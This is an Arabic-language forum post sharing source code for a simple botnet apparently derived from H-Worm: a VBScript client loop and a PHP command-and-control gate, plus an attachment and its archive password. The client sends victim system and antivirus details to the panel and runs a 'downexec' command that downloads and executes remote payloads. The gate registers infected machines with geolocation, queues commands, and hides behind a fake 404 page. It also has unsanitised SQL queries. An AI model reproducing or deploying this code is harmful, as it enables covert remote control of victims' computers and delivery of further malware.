كود سورس بوت نت بسيط ب vbs
#1
السلام عليكم
لم اقم بتجريبه ولا انصح بتجريبه للتحيل والتعلم فقط
البوت يعتمد على استقبال الاوامر من لوحة تحكم مبرمجة ب php
وذلك باستخدام البرامتر hwid الذي يمثل معرف فريد لكل جهاز
مبني على H-Worm
امر الارسال والاستقبال في ملف vbs
PHP كود :
Do
    
sBotData HEXEncode(sXOR(sGetID "::" sGetOS "::" sGetUserPC "::" sGetRAM "::" sGetAVsPassword))
    
sResponse sConnect("key=" sPassword "&string=" sBotDatasPassword)
    
sResponse HEXDecode(sResponse)
    
sCommand Split(sResponse"::")
    If 
Not sResponse "" Then
        Select 
Case sCommand(0)
            Case 
"downexec"
                
Call sDownloader(sCommand(1))
            
            Case 
"update"
                
Call sUpdate(sCommand(1))
            
            Case 
"uninstall"
                
Call sUninstall
        End Select
    End 
If
    
    
WScript.Sleep sDelay
Loop 
هذا ملف gate.php
PHP كود :
<?php
    
include_once('includes/config.php');
    include_once(
'includes/xor.php');
    include_once(
'includes/hexdecode.php');
    
    if (
$_SERVER['HTTP_USER_AGENT'] == htmlentities($botpassword)) {
        if (
$botpassword == htmlentities($_POST["key"])) {
            include(
"includes/GeoIP.inc");
    
            
$ip          $_SERVER['REMOTE_ADDR'];
              
$gi          geoip_open("includes/GeoIP.dat"GEOIP_STANDARD);
              
$countrycode geoip_country_code_by_addr($gi$ip);
            
$country     geoip_country_name_by_addr($gi$ip);
            if (
$countrycode == NULL) {
                
$countrycode "XX";
            }
            if (
$country == NULL) {
                
$country "Unknown";
            }
            
geoip_close($gi);
    
            
$time        time();
            
$string      $_POST["string"];
            
$string      hextostr($string);
            
$string      sXOR($string$botpassword);
            
$string      htmlentities($string);
            
            
$array explode("::"$string);
            
            
$hwid        $array[0];
            
$so          $array[1];
            
$userpc      $array[2];
            
$ram         $array[3];
            
$av          $array[4];
            
$status      "Online";
            
            if (
mysql_num_rows(mysql_query("SELECT * FROM bots WHERE hwid='$hwid'")) < 1) {
                
mysql_query("INSERT INTO bots (time, ip, hwid, country, countrycode, so, userpc, ram, av, status) VALUES ('$time', '$ip', '$hwid', '$country', '$countrycode', '$so', '$userpc', '$ram', '$av', '$status')");
            } else {
                
mysql_query("UPDATE bots SET time='$time' WHERE hwid='$hwid'");
                
mysql_query("UPDATE bots SET status='Online' WHERE hwid='$hwid'");
            }
        
            
$result mysql_query("SELECT * FROM cmd WHERE id NOT IN (SELECT id FROM history WHERE hwid='$hwid')");
            
$row    mysql_fetch_array($result);
            
            if (!
mysql_num_rows(mysql_query("SELECT * FROM history WHERE hwid='$hwid' && id = '$row[id]'"))) {
                echo 
bin2hex($row[cmd]);
                
                
mysql_query("INSERT INTO history (id, hwid) VALUES ($row[id], '$hwid') ");
                
mysql_query("UPDATE cmd SET done = done + 1 WHERE id = $row[id]");
            }
        
            
mysql_query("DELETE FROM cmd WHERE done >= amount");
        
        } else {
            
header('HTTP/1.0 404 Not Found');
            echo 
'<!DOCTYPE HTML PUBLIC "-IETFDTD HTML 2.0EN">'.PHP_EOL;
            echo 
'<html><head>'.PHP_EOL;
            echo 
'<title>404 Not Found</title>'.PHP_EOL;
            echo 
'</head><body>'.PHP_EOL;
            echo 
'<h1>Not Found</h1>'.PHP_EOL;
            echo 
'<p>The requested URL ' $_SERVER['REQUEST_URI'] . ' was not found on this server.</p>'.PHP_EOL;
            echo 
'<p>Additionally, a 404 Not Found'.PHP_EOL;
            echo 
'error was encountered while trying to use an ErrorDocument to handle the request.</p>'.PHP_EOL;
            echo 
'</body></html>'.PHP_EOL;
            exit();
        }
    } else {
        
header('HTTP/1.0 404 Not Found');
        echo 
'<!DOCTYPE HTML PUBLIC "-IETFDTD HTML 2.0EN">'.PHP_EOL;
        echo 
'<html><head>'.PHP_EOL;
        echo 
'<title>404 Not Found</title>'.PHP_EOL;
        echo 
'</head><body>'.PHP_EOL;
        echo 
'<h1>Not Found</h1>'.PHP_EOL;
        echo 
'<p>The requested URL ' $_SERVER['REQUEST_URI'] . ' was not found on this server.</p>'.PHP_EOL;
        echo 
'<p>Additionally, a 404 Not Found'.PHP_EOL;
        echo 
'error was encountered while trying to use an ErrorDocument to handle the request.</p>'.PHP_EOL;
        echo 
'</body></html>'.PHP_EOL;
        exit();
    }
?>
الملف تجدونه في المرفقات
تحذير الملف غير امن لا ينصح فتحه او استخدامه من طرف المبتدئين وكل يتحمل مسؤوليته
كلمة المرور delphi4arab


الملفات المرفقة
.rar   safe.rar (الحجم : 2.39 KB / التحميلات : 29)
الرد
#2
ماذا تقصد بـ : مبني على H-Worm ؟؟ o.O
تقصد يعني المبرمج هوديني Houdini Smile
الرد


التنقل السريع :


مستخدمين يتصفحوا هذا الموضوع: 1 ضيف